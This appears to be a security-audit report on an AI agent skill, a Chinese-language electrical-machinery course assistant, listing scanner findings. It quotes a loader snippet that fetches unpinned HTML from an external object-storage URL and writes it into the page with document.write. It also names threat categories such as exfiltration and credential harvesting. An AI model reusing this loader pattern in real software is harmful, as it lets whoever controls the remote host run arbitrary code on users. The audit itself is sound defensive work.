Back to skill

Security audit

伺服电机课程智能体

Security checks for vulnerabilities and agentic risk

Overview

The skill is mostly an educational course assistant, but it includes undisclosed web assets that can load and run remotely changeable HTML.

Review before installing or publishing. The course content itself looks purpose-aligned, but the remote HTML loader should be removed or replaced with the packaged local UI, or at minimum pinned, integrity-checked, sandboxed, and clearly disclosed. Avoid entering sensitive information into the web UI until that is fixed.

Vulnerability Patterns
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
Findings (2)

T03 · Remote Payload Retrieval and Execution

Error
Location
assets/loader.html:14
Finding

Unverified Remote HTML Retrieval and Execution

Content
View full analysis
(function(){ var u='https://astron-claw-media-prod.oss-cn-beijing.aliyuncs.com/astron-claw-media-prod/68ebec39-0394-4a2e-a63d-4de9bdee2115/index.html'; var xhr=new XMLHttpRequest(); xhr.open('GET',u,true); xhr.onload=function(){ if(xhr.status===200){ var h=xhr.responseText; var w=document.open('text/html','replace'); w.write(h); w.close(); }else{ ``` The request is subsequently issued by `xhr.send()` on line 30. ### Technical Analysis The loader obtains an HTML document from external object storage at runtime and writes the response directly into the active browser document. Calling `document.open()`, `document.write()`, and `document.close()` replaces the reviewed local page with the remotely supplied response. Scripts contained in that response can consequently execute in the page context. The remote artifact is not pinned to a content hash or immutable version, and the loader performs no cryptographic signature verification, integrity validation, content-type enforcement, or sanitization. Control or compromise of the object-storage account, the hosted object, or the delivery path would therefore permit the effective application payload to change after the Skill package has been reviewed. This behavior is not disclosed in `SKILL.md` and is unnecessary for the declared local educational functionality. A readable local application already exists at `assets/index.html`. ### Attack Path 1. A user or hosting environment opens `assets/loader.html`. 2. The page sends an HTTP GET request to the configured Aliyun OSS URL. 3. The storage operator, a compromised account, or another party able to modify the object returns attacker-controlled HTML. 4. The loader accepts the response ...[truncated 1171 chars]
Remediation
View remediation

T04 · Embedded Malicious Code

Error
Location
assets/app.html:1
Finding

Opaque Base64-Embedded Executable HTML Document

Content
View full analysis
电机学课程智能体body,html{margin:0;padding:0;width:100%;height:100%;overflow:hidden}iframe{width:100%;height:100%;border:none}
Remediation
View remediation
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
Findings (25)

Hidden Instructions

High
Category
Prompt Injection
Confidence
70% confidence
Finding

Hidden instructions were detected in comments or invisible text. These could contain malicious directives. Manual review is recommended.

Content

Scanner excerpt · assets/index.html (reported line 275)May include surrounding context.

html
</div>
  </div>

  <!-- ========== Knowledge Section ========== -->
  <div class="section active" id="sec-knowledge">
    <div class="search-box">
      <span class="search-icon">🔍</span>

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The manifest says the skill triggers not only on specific course keywords but also whenever a user 'requests electromachinery knowledge explanation, problem solving, practice questions, or teaching video recommendations.' Those activity-based conditions are broad and lack explicit exclusions, making it unclear when general tutoring or generic video-recommendation requests should or should not invoke this skill.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

This HTML file hard-codes Chinese-only titles, labels, prompts, and embedded content, including a zh-CN language setting inside the embedded page, with no visible mechanism for users to choose another language. That creates a natural-language locale policy issue because the skill effectively mandates a specific language without opt-in or justification.

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

This Python file embeds all user-facing question and answer text in Chinese, and there is no natural-language indication that the skill supports language selection or is intentionally limited to a Chinese-speaking context. Under the language/locale policy, forcing a specific language without user opt-in is a policy concern.

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The HTML root sets lang="zh-CN", and the visible interface text throughout the page is exclusively Chinese. Under the language/locale policy rule, forcing a specific language without opt-in or an explicit documented justification can violate organizational expectations for user choice.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

The manifest describes an 'electrical-machinery-course' skill focused on 电机学, but the page title, header, and hero branding present the skill as a '伺服电机课程智能体'. That is a semantic mismatch in advertised purpose, especially because users would expect a servo-motor-specific assistant while the underlying content is general 电机学 material.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
98% confidence
Finding

The file is not implementing local course functionality; it fetches remote HTML from an external domain and replaces the current document with that content using document.write(). This creates a remote content execution surface where whoever controls the external resource can change the skill behavior at any time, enabling phishing, script injection, data collection, or delivery of content unrelated to the declared educational purpose.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

A generic remote document injection mechanism is unnecessary for a course Q&A/practice/video skill and materially expands the trust boundary. Because the fetched response is written directly into the top-level document, the remote endpoint can fully redefine the UI and client-side behavior, making abuse or silent repurposing of the skill straightforward.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The page silently retrieves and injects remote HTML without telling the user that the displayed interface comes from an external source. This lack of disclosure undermines user trust and makes deceptive UX, consent bypass, and covert content changes more dangerous because users believe they are interacting only with the declared skill.

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Ae4

Medium
Category
analysis-evasion
Confidence
80% confidence
Finding

Suspicious Unicode normalization or mixed-script content

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

This markdown file is entirely written in Chinese and the usage examples instruct users to interact with the agent in Chinese, but it does not offer any language or locale choice. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale restriction is clearly documented and justified.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
88% confidence
Finding

The description is entirely framed in Chinese for a specific university audience and does not indicate that users may choose another language. Under the language/locale policy, forcing a specific language without offering user choice can be a natural-language policy violation unless clearly justified as a region-specific tool.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Low
Category
Not specified by scanner
Confidence
86% confidence
Finding

The embedded page includes external Google Fonts resources inside the iframe content, which introduces outbound network access not justified by a motor-course Q&A, quiz, and video-recommendation skill. Fetching custom fonts is a presentational enhancement rather than a direct requirement of the declared teaching functionality.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Low
Category
Not specified by scanner
Confidence
92% confidence
Finding

The manifest claims five main blocks: 直流电机、变压器、交流绕组、异步电机、同步电机. The code adds a sixth full chapter, '电机实验', with safety rules, test procedures, and data processing, which expands the skill beyond the described five-block scope.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
91% confidence
Finding

The natural-language strings in the title and status/error messages are all fixed in Chinese, which imposes a specific language on users without any visible opt-in or alternative. The policy allows locale constraints when they are explicitly documented and justified, but this file does not communicate such a limitation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
98% confidence
Finding

This file contains natural-language questions, explanations, and labels exclusively in Chinese, and there is no indication that users can opt into another language or that the skill is intentionally restricted to a Chinese-language audience. Under the policy, forcing a specific language without user opt-in is a natural-language policy concern.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
91% confidence
Finding

This markdown file presents all instructional content in a single language and does not mention any user opt-in, alternative language availability, or region-specific constraint. Under the policy rule for language or locale, forcing a specific language without documented choice or justification is a natural-language policy concern.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
95% confidence
Finding

This markdown file presents the entire skill content in Chinese and identifies it as material for a specific Chinese university program, without offering any language choice or opt-in. Under the policy rule for natural-language violations, forcing a specific language or locale without user choice is a reportable issue unless clearly justified as a region-specific tool.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
91% confidence
Finding

SQP-3 applies to all file types and includes language or locale policy violations. This markdown file begins with and continues in Chinese only, without any note that the language is optional, selectable, or justified as region-specific.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.